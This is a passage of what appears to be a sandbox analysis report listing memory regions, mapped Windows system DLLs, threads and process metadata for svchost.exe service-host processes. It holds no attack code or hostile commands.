"locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1919 start_va = 0x1518c10000 end_va = 0x1518c10fff entry_point = 0x0 region_type = private name = "private_0x0000001518c10000" filename = "" Region: id = 1920 start_va = 0x1518c20000 end_va = 0x1518c20fff entry_point = 0x0 region_type = private name = "private_0x0000001518c20000" filename = "" Region: id = 1921 start_va = 0x1518c30000 end_va = 0x1518c30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001518c30000" filename = "" Region: id = 1922 start_va = 0x1518c40000 end_va = 0x1518c40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001518c40000" filename = "" Region: id = 1923 start_va = 0x1518c50000 end_va = 0x1518c56fff entry_point = 0x0 region_type = private name = "private_0x0000001518c50000" filename = "" Region: id = 1924 start_va = 0x1518d00000 end_va = 0x1518dfffff entry_point = 0x0 region_type = private name = "private_0x0000001518d00000" filename = "" Region: id = 1925 start_va = 0x1518e00000 end_va = 0x1518e7ffff entry_point = 0x0 region_type = private name = "private_0x0000001518e00000" filename = "" Region: id = 1926 start_va = 0x1518e80000 end_va = 0x1518e86fff entry_point = 0x0 region_type = private name = "private_0x0000001518e80000" filename = "" Region: id = 1927 start_va = 0x1518f00000 end_va = 0x1518ffffff entry_point = 0x0 region_type = private name = "private_0x0000001518f00000" filename = "" Region: id = 1928 start_va = 0x1519000000 end_va = 0x1519187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001519000000" filename = "" Region: id = 1929 start_va = 0x1519190000 end_va = 0x1519310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001519190000" filename = "" Region: id = 1930 start_va = 0x1519320000 end_va = 0x15193dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001519320000" filename = "" Region: id = 1931 start_va = 0x15193e0000 end_va = 0x15194dffff entry_point = 0x0 region_type = private name = "private_0x00000015193e0000" filename = "" Region: id = 1932 start_va = 0x15194e0000 end_va = 0x15195dffff entry_point = 0x0 region_type = private name = "private_0x00000015194e0000" filename = "" Region: id = 1933 start_va = 0x15195e0000 end_va = 0x15196dffff entry_point = 0x0 region_type = private name = "private_0x00000015195e0000" filename = "" Region: id = 1934 start_va = 0x15196e0000 end_va = 0x1519a16fff entry_point = 0x15196e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1935 start_va = 0x1519a20000 end_va = 0x1519b1ffff entry_point = 0x0 region_type = private name = "private_0x0000001519a20000" filename = "" Region: id = 1936 start_va = 0x1519b20000 end_va = 0x1519c1ffff entry_point = 0x0 region_type = private name = "private_0x0000001519b20000" filename = "" Region: id = 1937 start_va = 0x1519d20000 end_va = 0x1519e1ffff entry_point = 0x0 region_type = private name = "private_0x0000001519d20000" filename = "" Region: id = 1938 start_va = 0x1519e20000 end_va = 0x1519f1ffff entry_point = 0x0 region_type = private name = "private_0x0000001519e20000" filename = "" Region: id = 1939 start_va = 0x1519f20000 end_va = 0x151a01ffff entry_point = 0x0 region_type = private name = "private_0x0000001519f20000" filename = "" Region: id = 1940 start_va = 0x7df5ff230000 end_va = 0x7ff5ff22ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff230000" filename = "" Region: id = 1941 start_va = 0x7ff6e0622000 end_va = 0x7ff6e0623fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0622000" filename = "" Region: id = 1942 start_va = 0x7ff6e0624000 end_va = 0x7ff6e0625fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0624000" filename = "" Region: id = 1943 start_va = 0x7ff6e0626000 end_va = 0x7ff6e0627fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0626000" filename = "" Region: id = 1944 start_va = 0x7ff6e062a000 end_va = 0x7ff6e062bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e062a000" filename = "" Region: id = 1945 start_va = 0x7ff6e062c000 end_va = 0x7ff6e062dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e062c000" filename = "" Region: id = 1946 start_va = 0x7ff6e062e000 end_va = 0x7ff6e062ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e062e000" filename = "" Region: id = 1947 start_va = 0x7ff6e0630000 end_va = 0x7ff6e072ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0630000" filename = "" Region: id = 1948 start_va = 0x7ff6e0730000 end_va = 0x7ff6e0752fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0730000" filename = "" Region: id = 1949 start_va = 0x7ff6e0754000 end_va = 0x7ff6e0755fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0754000" filename = "" Region: id = 1950 start_va = 0x7ff6e0756000 end_va = 0x7ff6e0757fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0756000" filename = "" Region: id = 1951 start_va = 0x7ff6e0758000 end_va = 0x7ff6e0759fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0758000" filename = "" Region: id = 1952 start_va = 0x7ff6e075c000 end_va = 0x7ff6e075cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e075c000" filename = "" Region: id = 1953 start_va = 0x7ff6e075e000 end_va = 0x7ff6e075ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e075e000" filename = "" Region: id = 1954 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1955 start_va = 0x7ffc46ca0000 end_va = 0x7ffc46ce0fff entry_point = 0x7ffc46ca0000 region_type = mapped_file name = "ssdpsrv.dll" filename = "\\Windows\\System32\\ssdpsrv.dll" (normalized: "c:\\windows\\system32\\ssdpsrv.dll") Region: id = 1956 start_va = 0x7ffc4b030000 end_va = 0x7ffc4b072fff entry_point = 0x7ffc4b030000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 1957 start_va = 0x7ffc4f8b0000 end_va = 0x7ffc4f8b7fff entry_point = 0x7ffc4f8b0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1958 start_va = 0x7ffc4f8c0000 end_va = 0x7ffc4f8c7fff entry_point = 0x7ffc4f8c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1959 start_va = 0x7ffc4f8d0000 end_va = 0x7ffc4f8d9fff entry_point = 0x7ffc4f8d0000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1960 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1961 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1962 start_va = 0x7ffc511b0000 end_va = 0x7ffc51332fff entry_point = 0x7ffc511b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1963 start_va = 0x7ffc51340000 end_va = 0x7ffc513b1fff entry_point = 0x7ffc51340000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1964 start_va = 0x7ffc514f0000 end_va = 0x7ffc514fbfff entry_point = 0x7ffc514f0000 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 1965 start_va = 0x7ffc51a50000 end_va = 0x7ffc51a7cfff entry_point = 0x7ffc51a50000 region_type = mapped_file name = "timebrokerserver.dll" filename = "\\Windows\\System32\\TimeBrokerServer.dll" (normalized: "c:\\windows\\system32\\timebrokerserver.dll") Region: id = 1966 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1967 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1968 start_va = 0x7ffc52730000 end_va = 0x7ffc527f7fff entry_point = 0x7ffc52730000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 1969 start_va = 0x7ffc52e40000 end_va = 0x7ffc52e7efff entry_point = 0x7ffc52e40000 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1970 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1971 start_va = 0x7ffc52f40000 end_va = 0x7ffc5302dfff entry_point = 0x7ffc52f40000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1972 start_va = 0x7ffc532b0000 end_va = 0x7ffc532e1fff entry_point = 0x7ffc532b0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1973 start_va = 0x7ffc532f0000 end_va = 0x7ffc53371fff entry_point = 0x7ffc532f0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1974 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1975 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1976 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1977 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1978 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1979 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1980 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1981 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1982 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1983 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1984 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1985 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1986 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1987 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1988 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1989 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1990 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1991 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1992 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1993 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1994 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1995 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1996 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1997 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1998 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1999 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 272 os_tid = 0xa48 Thread: id = 273 os_tid = 0x95c Thread: id = 274 os_tid = 0x918 Thread: id = 275 os_tid = 0x904 Thread: id = 276 os_tid = 0x8fc Thread: id = 277 os_tid = 0x8f8 Thread: id = 278 os_tid = 0x8c8 Thread: id = 279 os_tid = 0x3a8 Thread: id = 280 os_tid = 0x3a4 Thread: id = 281 os_tid = 0x35c Thread: id = 465 os_tid = 0xd9c Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3bb6c000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xa], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\DeviceAssociationService" [0xa], "NT SERVICE\\DevQueryBroker" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\DsSvc" [0xa], "NT SERVICE\\fhsvc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\NcbService" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\ScDeviceEnum" [0xa], "NT SERVICE\\SensorService" [0xa], "NT SERVICE\\SmsRouter" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\svsvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\vmicguestinterface" [0xa], "NT SERVICE\\vmickvpexchange" [0xa], "NT SERVICE\\vmicshutdown" [0xa], "NT SERVICE\\vmicvmsession" [0xa], "NT SERVICE\\vmicvss" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\WiaRpc" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xe], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e390" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 458 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 459 start_va = 0x8ec7050000 end_va = 0x8ec705ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008ec7050000" filename = "" Region: id = 460 start_va = 0x8ec7060000 end_va = 0x8ec7060fff entry_point = 0x8ec7060000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 461 start_va = 0x8ec7070000 end_va = 0x8ec7083fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008ec7070000" filename = "" Region: id = 462 start_va = 0x8ec7090000 end_va = 0x8ec710ffff entry_point = 0x0 region_type = private name = "private_0x0000008ec7090000" filename = "" Region: id = 463 start_va = 0x8ec7110000 end_va = 0x8ec7113fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008ec7110000" filename = "" Region: id = 464 start_va = 0x8ec7120000 end_va = 0x8ec7120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008ec7120000" filename = "" Region: id = 465 start_va = 0x8ec7130000 end_va = 0x8ec7131fff entry_point = 0x0 region_type = private name = "private_0x0000008ec7130000" filename = "" Region: id = 466 start_va = 0x8ec7140000 end_va = 0x8ec7140fff entry_point = 0x0 region_type = private name = "private_0x0000008ec7140000" filename = "" Region: id = 467 start_va = 0x8ec7150000 end_va = 0x8ec7150fff entry_point = 0x0 region_type = private name = "private_0x0000008ec7150000" filename = "" Region: id = 468 start_va = 0x8ec7160000 end_va = 0x8ec7160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008ec7160000" filename = "" Region: id = 469 start_va = 0x8ec7170000 end_va = 0x8ec7176fff entry_point = 0x0 region_type = private name = "private_0x0000008ec7170000" filename = "" Region: id = 470 start_va = 0x8ec7200000 end_va = 0x8ec72fffff entry_point = 0x0 region_type = private name = "private_0x0000008ec7200000" filename = "" Region: id = 471 start_va = 0x8ec7300000 end_va = 0x8ec73bdfff entry_point = 0x8ec7300000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 472 start_va = 0x8ec73c0000 end_va = 0x8ec747ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008ec73c0000" filename = "" Region: id = 473 start_va = 0x8ec7480000 end_va = 0x8ec7480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008ec7480000" filename = "" Region: id = 474 start_va = 0x8ec7490000 end_va = 0x8ec7490fff entry_point = 0x0 region_type = private name = "private_0x0000008ec7490000" filename = "" Region: id = 475 start_va = 0x8ec74a0000 end_va = 0x8ec74a0fff entry_point = 0x0 region_type = private name = "private_0x0000008ec74a0000" filename = "" Region: id = 476 start_va = 0x8ec74b0000 end_va = 0x8ec74b0fff entry_point = 0x8ec74b0000 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 477 start_va = 0x8ec74c0000 end_va = 0x8ec74c0fff entry_point = 0x8ec74c0000 region_type = mapped_file name = "audioendpointbuilder.dll.mui" filename = "\\Windows\\System32\\en-US\\AudioEndpointBuilder.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\audioendpointbuilder.dll.mui") Region: id = 478 start_va = 0x8ec74d0000 end_va = 0x8ec74d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008ec74d0000" filename = "" Region: id = 479 start_va = 0x8ec74e0000 end_va = 0x8ec74e5fff entry_point = 0x8ec74e0000 region_type = mapped_file name = "sysmain.dll.mui" filename = "\\Windows\\System32\\en-US\\sysmain.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sysmain.dll.mui") Region: id = 480 start_va = 0x8ec74f0000 end_va = 0x8ec74f6fff entry_point = 0x0 region_type = private name = "private_0x0000008ec74f0000" filename = "" Region: id = 481 start_va = 0x8ec7510000 end_va = 0x8ec7516fff entry_point = 0x0 region_type = private name = "private_0x0000008ec7510000" filename = "" Region: id = 482 start_va = 0x8ec7520000 end_va = 0x8ec759ffff entry_point = 0x0 region_type = private name = "private_0x0000008ec7520000" filename = "" Region: id = 483 start_va = 0x8ec75a0000 end_va = 0x8ec75d0fff entry_point = 0x8ec75a0000 region_type = mapped_file name = "pfpre_871cf952.mkd" filename = "\\Windows\\Prefetch\\PfPre_871cf952.mkd" (normalized: "c:\\windows\\prefetch\\pfpre_871cf952.mkd") Region: id = 484 start_va = 0x8ec7600000 end_va = 0x8ec76fffff entry_point = 0x0 region_type = private name = "private_0x0000008ec7600000" filename = "" Region: id = 485 start_va = 0x8ec7700000 end_va = 0x8ec7887fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008ec7700000" filename = "" Region: id = 486 start_va = 0x8ec7890000 end_va = 0x8ec7a10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008ec7890000" filename = "" Region: id = 487 start_va = 0x8ec7a20000 end_va = 0x8ec7b1ffff entry_point = 0x0 region_type = private name = "private_0x0000008ec7a20000" filename = "" Region: id = 488 start_va = 0x8ec7b20000 end_va = 0x8ec7c1ffff entry_point = 0x0 region_type = private name = "private_0x0000008ec7b20000" filename = "" Region: id = 489 start_va = 0x8ec7d20000 end_va = 0x8ec7e1ffff entry_point = 0x0 region_type = private name = "private_0x0000008ec7d20000" filename = "" Region: id = 490 start_va = 0x8ec7e20000 end_va = 0x8ec7e63fff entry_point = 0x0 region_type = private name = "private_0x0000008ec7e20000" filename = "" Region: id = 491 start_va = 0x8ec7ea0000 end_va = 0x8ec7f1ffff entry_point = 0x0 region_type = private name = "private_0x0000008ec7ea0000" filename = "" Region: id = 492 start_va = 0x8ec7f20000 end_va = 0x8ec8256fff entry_point = 0x8ec7f20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 493 start_va = 0x8ec8260000 end_va = 0x8ec835ffff entry_point = 0x0 region_type = private name = "private_0x0000008ec8260000" filename = "" Region: id = 494 start_va = 0x8ec83e0000 end_va = 0x8ec84dffff entry_point = 0x0 region_type = private name = "private_0x0000008ec83e0000" filename = "" Region: id = 495 start_va = 0x8ec84e0000 end_va = 0x8ec85dffff entry_point = 0x0 region_type = private name = "private_0x0000008ec84e0000" filename = "" Region: id = 496 start_va = 0x8ec85e0000 end_va = 0x8ec86dffff entry_point = 0x0 region_type = private name = "private_0x0000008ec85e0000" filename = "" Region: id = 497 start_va = 0x8ec86e0000 end_va = 0x8ec87dffff entry_point = 0x0 region_type = private name = "private_0x0000008ec86e0000" filename = "" Region: id = 498 start_va = 0x8ec8800000 end_va = 0x8ec88fffff entry_point = 0x0 region_type = private name = "private_0x0000008ec8800000" filename = "" Region: id = 499 start_va = 0x8ec8900000 end_va = 0x8ec89fffff entry_point = 0x0 region_type = private name = "private_0x0000008ec8900000" filename = "" Region: id = 500 start_va = 0x8ec8a00000 end_va = 0x8ec8afffff entry_point = 0x0 region_type = private name = "private_0x0000008ec8a00000" filename = "" Region: id = 501 start_va = 0x8ec8b30000 end_va = 0x8ec8b36fff entry_point = 0x0 region_type = private name = "private_0x0000008ec8b30000" filename = "" Region: id = 502 start_va = 0x8ec8c00000 end_va = 0x8ec8cfffff entry_point = 0x0 region_type = private name = "private_0x0000008ec8c00000" filename = "" Region: id = 503 start_va = 0x8ec8d00000 end_va = 0x8fc8cfffff entry_point = 0x0 region_type = private name = "private_0x0000008ec8d00000" filename = "" Region: id = 504 start_va = 0x8fc8d00000 end_va = 0x8fc8dfffff entry_point = 0x0 region_type = private name = "private_0x0000008fc8d00000" filename = "" Region: id = 505 start_va = 0x8fc8e00000 end_va = 0x8fc91fffff entry_point = 0x0 region_type = private name = "private_0x0000008fc8e00000" filename = "" Region: id = 506 start_va = 0x8fc9200000 end_va = 0x8fc92fffff entry_point = 0x0 region_type = private name = "private_0x0000008fc9200000" filename = "" Region: id = 507 start_va = 0x8fc9300000 end_va = 0x8fc93fffff entry_point = 0x0 region_type = private name = "private_0x0000008fc9300000" filename = "" Region: id = 508 start_va = 0x8fc9450000 end_va = 0x8fc9563fff entry_point = 0x0 region_type = private name = "private_0x0000008fc9450000" filename = "" Region: id = 509 start_va = 0x8fc9600000 end_va = 0x8fc96fffff entry_point = 0x0 region_type = private name = "private_0x0000008fc9600000" filename = "" Region: id = 510 start_va = 0x8fc9700000 end_va = 0x8fc97fffff entry_point = 0x0 region_type = private name = "private_0x0000008fc9700000" filename = "" Region: id = 511 start_va = 0x8fc9800000 end_va = 0x8fc98fffff entry_point = 0x0 region_type = private name = "private_0x0000008fc9800000" filename = "" Region: id = 512 start_va = 0x8fc9c00000 end_va = 0x8fc9cfffff entry_point = 0x0 region_type = private name = "private_0x0000008fc9c00000" filename = "" Region: id = 513 start_va = 0x8fc9e00000 end_va = 0x8fc9efffff entry_point = 0x0 region_type = private name = "private_0x0000008fc9e00000" filename = "" Region: id = 514 start_va = 0x8fc9f00000 end_va = 0x8fc9ffffff entry_point = 0x0 region_type = private name = "private_0x0000008fc9f00000" filename = "" Region: id = 515 start_va = 0x8fca000000 end_va = 0x8fca0fffff entry_point = 0x0 region_type = private name = "private_0x0000008fca000000" filename = "" Region: id = 516 start_va = 0x8fca200000 end_va = 0x8fca2fffff entry_point = 0x0 region_type = private name = "private_0x0000008fca200000" filename = "" Region: id = 517 start_va = 0x8fca400000 end_va = 0x8fca4fffff entry_point = 0x0 region_type = private name = "private_0x0000008fca400000" filename = "" Region: id = 518 start_va = 0x8fca600000 end_va = 0x8fca6fffff entry_point = 0x0 region_type = private name = "private_0x0000008fca600000" 